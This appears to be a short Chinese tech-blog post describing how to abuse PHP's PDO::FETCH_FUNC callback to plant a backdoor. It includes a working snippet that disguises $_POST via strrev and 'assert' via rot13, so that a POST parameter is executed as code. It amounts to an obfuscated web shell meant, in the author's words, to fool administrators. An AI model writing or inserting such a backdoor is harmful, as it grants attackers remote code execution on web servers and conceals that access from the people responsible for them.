IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    利用PDO::FETCH_FUNC特性留后门

    b4dboy发表于 2015-06-16 08:16:03
    love 0
    翻手册的时候发现fetch_argument的参数PDO::FETCH_FUNC可以回调一个函数,用这东西留个后门应该可以迷惑部分管理员。 适用于:(PHP 5 >= 5.1.0, PECL pdo >= 0.1.0)。 View Code PHP<?php   if(($db = @new PDO('sqlite::memory:')) && ($sql = strrev('TSOP_')) && ($sql = $$sql)) { $stmt = @$db->query("SELECT '{$sql[b4dboy]}'"); $result = @$stmt->fetchAll(PDO::FETCH_FUNC, str_rot13('nffreg')); }   ?>


沪ICP备19023445号-2号
友情链接